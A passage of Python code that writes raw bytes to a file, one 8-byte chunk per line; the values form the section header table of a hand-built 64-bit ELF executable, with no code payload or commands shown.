file.write(b'\x02\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\xa8\x01\x00@\x00\x00\x00\x00')
file.write(b'\xa8\x01\x00\x00\x00\x00\x00\x00')
file.write(b'\x08\x01\x00\x00\x00\x00\x00\x00')
file.write(b'\x04\x00\x00\x00\x01\x00\x00\x00')
file.write(b'\x08\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x18\x00\x00\x00\x00\x00\x00\x00')
file.write(b'1\x00\x00\x00\x03\x00\x00\x00')
file.write(b'\x02\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\xb0\x02\x00@\x00\x00\x00\x00')
file.write(b'\xb0\x02\x00\x00\x00\x00\x00\x00')
file.write(b'R\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x01\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'9\x00\x00\x00\x04\x00\x00\x00')
file.write(b'B\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x08\x03\x00@\x00\x00\x00\x00')
file.write(b'\x08\x03\x00\x00\x00\x00\x00\x00')
file.write(b'\xc0\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x03\x00\x00\x00\x0f\x00\x00\x00')
file.write(b'\x08\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x18\x00\x00\x00\x00\x00\x00\x00')
file.write(b'C\x00\x00\x00\x01\x00\x00\x00')
file.write(b'\x06\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\xc8\x03\x00@\x00\x00\x00\x00')
file.write(b'\xc8\x03\x00\x00\x00\x00\x00\x00')
file.write(b'\r\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x01\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'>\x00\x00\x00\x01\x00\x00\x00')
file.write(b'\x06\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\xe0\x03\x00@\x00\x00\x00\x00')
file.write(b'\xe0\x03\x00\x00\x00\x00\x00\x00')
file.write(b'\x90\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x10\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x10\x00\x00\x00\x00\x00\x00\x00')
file.write(b'I\x00\x00\x00\x01\x00\x00\x00')
file.write(b'\x06\x00\x00\x00\x00\x00\x00\x00')
file.write(b'p\x04\x00@\x00\x00\x00\x00')
file.write(b'p\x04\x00\x00\x00\x00\x00\x00')
file.write(b'\xb1\x02\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x10\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'O\x00\x00\x00\x01\x00\x00\x00')
file.write(b'\x06\x00\x00\x00\x00\x00\x00\x00')
file.write(b'!\x07\x00@\x00\x00\x00\x00')
file.write(b'!\x07\x00\x00\x00\x00\x00\x00')
file.write(b'\x08\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x01\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'U\x00\x00\x00\x01\x00\x00\x00')
file.write(b'\x02\x00\x00\x00\x00\x00\x00\x00')
file.write(b')\x07\x00@\x00\x00\x00\x00')
file.write(b')\x07\x00\x00\x00\x00\x00\x00')
file.write(b'\r\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x01\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b']\x00\x00\x00\x01\x00\x00\x00')
file.write(b'\x02\x00\x00\x00\x00\x00\x00\x00')
file.write(b'8\x07\x00@\x00\x00\x00\x00')
file.write(b'8\x07\x00\x00\x00\x00\x00\x00')
file.write(b'\xa0\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x08\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'g\x00\x00\x00\x01\x00\x00\x00')
file.write(b'\x03\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\xd8\x07 @\x00\x00\x00\x00')
file.write(b'\xd8\x07\x00\x00\x00\x00\x00\x00')
file.write(b'\x10\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x08\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'n\x00\x00\x00\x01\x00\x00\x00')
file.write(b'\x03\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\xe8\x07 @\x00\x00\x00\x00')
file.write(b'\xe8\x07\x00\x00\x00\x00\x00\x00')
file.write(b'\x10\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x08\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'u\x00\x00\x00\x06\x00\x00\x00')
file.write(b'\x03\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\xf8\x07 @\x00\x00\x00\x00')
file.write(b'\xf8\x07\x00\x00\x00\x00\x00\x00')
file.write(b'0\x01\x00\x00\x00\x00\x00\x00')
file.write(b'\x04\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x08\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x10\x00\x00\x00\x00\x00\x00\x00')
file.write(b'~\x00\x00\x00\x01\x00\x00\x00')
file.write(b'\x03\x00\x00\x00\x00\x00\x00\x00')
file.write(b'(\t @\x00\x00\x00\x00')
file.write(b'(\t\x00\x00\x00\x00\x00\x00')
file.write(b'X\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x08\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x08\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x87\x00\x00\x00\x01\x00\x00\x00')
file.write(b'\x03\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x80\t @\x00\x00\x00\x00')
file.write(b'\x80\t\x00\x00\x00\x00\x00\x00')
file.write(b'\x08\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x08\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x8d\x00\x00\x00\x08\x00\x00\x00')
file.write(b'\x03\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\xa0\t @\x00\x00\x00\x00')
file.write(b'\x88\t\x00\x00\x00\x00\x00\x00')
file.write(b'P\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b' \x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x92\x00\x00\x00\x01\x00\x00\x00')
file.write(b'0\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x88\t\x00\x00\x00\x00\x00\x00')
file.write(b',\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x01\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x01\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x01\x00\x00\x00\x02\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\xb8\t\x00\x00\x00\x00\x00\x00')
file.write(b'\xf0\x03\x00\x00\x00\x00\x00\x00')
file.write(b'\x14\x00\x00\x00\x16\x00\x00\x00')
file.write(b'\x08\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x18\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\t\x00\x00\x00\x03\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\xa8\r\x00\x00\x00\x00\x00\x00')
file.write(b'\xa6\x01\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x01\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x11\x00\x00\x00\x03\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'N\x0f\x00\x00\x00\x00\x00\x00')
file.write(b'\x9b\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x01\x00\x00\x00\x00\x00\x00\x00')
file.write(b'\x00\x00\x00\x00\x00\x00\x00\x00')
